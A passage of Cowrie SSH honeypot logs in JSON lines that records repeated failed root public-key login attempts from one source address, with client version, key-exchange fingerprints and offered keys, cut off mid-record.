{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.242549Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.645481Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.646116Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.847997Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a5:91:a4:76:93:dd:aa:e6:b8:40:f7:18:96:db:84:f5","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8vlPpc3X7NgX49pTAOpBIKdDQZToL5nhK+XK75dzy04bxU6znKwRRQEF42q5arOC7AWNUY8V+i9J5u1kQQGaUD4zmB8TIrCVmiSb4Fx0Kl/TQ2YzjTgo7PU7HPUk2l/SyqRlkmJbYwziygRlTiBMYcocdnpOcd7EZ+JbDHP7u1IM2pdpnokPsK4S2OT8HJ0wEmMObYTKX8efyXvHacU8Tp1oTBwgYJFVQufL+8BO2N5BBiD/FCPpso7RZqTp0yKcfvtnEDL0Duw7Xmz0JSUsKtN+uUEwJMEHPl5bo05EKI50H1t3xv6GZ32RICjaA/4gdx9p+Oc/xtvWmuvCI5/PJ","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:33.848795Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:34.050112Z","src_ip":"212.227.235.229","session":"e87ca4e235a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50316,"dst_ip":"1.2.3.4","dst_port":22,"session":"e280aa679825","protocol":"ssh","message":"New connection: 212.227.235.229:50316 (1.2.3.4:22) [session: e280aa679825]","sensor":"my-vps","timestamp":"2025-08-26T12:19:34.251778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:34.252559Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:34.454049Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:34.862060Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:34.862710Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","sensor":"my-vps","timestamp":"2025-08-26T12:19:35.066944Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"97:93:1e:9e:38:7f:73:6c:46:8f:0c:b3:40:1b:60:24","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcruNXAoSCo4DqHKGpCDVG1qo0B9fgztmP2LHQJ+XzCTcB6N7Mu5tatfaDFyiAORAISsiOrXLQDGaj/EGuVtoKec2YDNAdvR4PDpYMx1DNse91rMD/LFtwzjwCCdoyDzgT+mgfowEtTVabAfJWi4ZR/5zLxp0daUIopbd7Cn5xXyY/Fd42BwXHyTIz3iqlu9Fb5nJUJ49NRgfuSWl3sm67Cm3t5TE9s0lG3SE9yzlhR5K7jlVqyiXGHJuoSfCDiCfa655LPgyI+gkPNp44qE3G60w3Qp7flNuLVoEtg+xhlou5y3AsDYO8PRoZx3ohF+UYyMWIAJRlTZUKTg2m1CbR","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:35.067579Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:35.274193Z","src_ip":"212.227.235.229","session":"e280aa679825"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50328,"dst_ip":"1.2.3.4","dst_port":22,"session":"9211c480b062","protocol":"ssh","message":"New connection: 212.227.235.229:50328 (1.2.3.4:22) [session: 9211c480b062]","sensor":"my-vps","timestamp":"2025-08-26T12:19:35.473224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:35.474164Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:35.674302Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.083792Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.084468Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.285838Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"46:1b:59:74:3e:24:19:b3:09:80:6d:32:33:a5:e4:d4","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILZMR3AsV6mzndFLFF/oghW+bs9yVkvvvhhHGT7e167k","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.287213Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.488045Z","src_ip":"212.227.235.229","session":"9211c480b062"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50334,"dst_ip":"1.2.3.4","dst_port":22,"session":"50bfe82440e5","protocol":"ssh","message":"New connection: 212.227.235.229:50334 (1.2.3.4:22) [session: 50bfe82440e5]","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.690402Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.691557Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:36.894860Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.301217Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.301888Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key attempt for user root of type ssh-ed25519 with fingerprint 31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.505931Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"31:37:b7:f7:a7:6a:40:55:79:fe:90:69:de:35:05:67","key":"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGnSXQwfse2xGZ6wGn3ng++QmelqwRocuAXe82dFpc/3","type":"ssh-ed25519","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.506528Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.709411Z","src_ip":"212.227.235.229","session":"50bfe82440e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51782,"dst_ip":"1.2.3.4","dst_port":22,"session":"48bb71a003d3","protocol":"ssh","message":"New connection: 212.227.235.229:51782 (1.2.3.4:22) [session: 48bb71a003d3]","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.909951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:37.910886Z","src_ip":"212.227.235.229","session":"48bb71a003d3"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-ce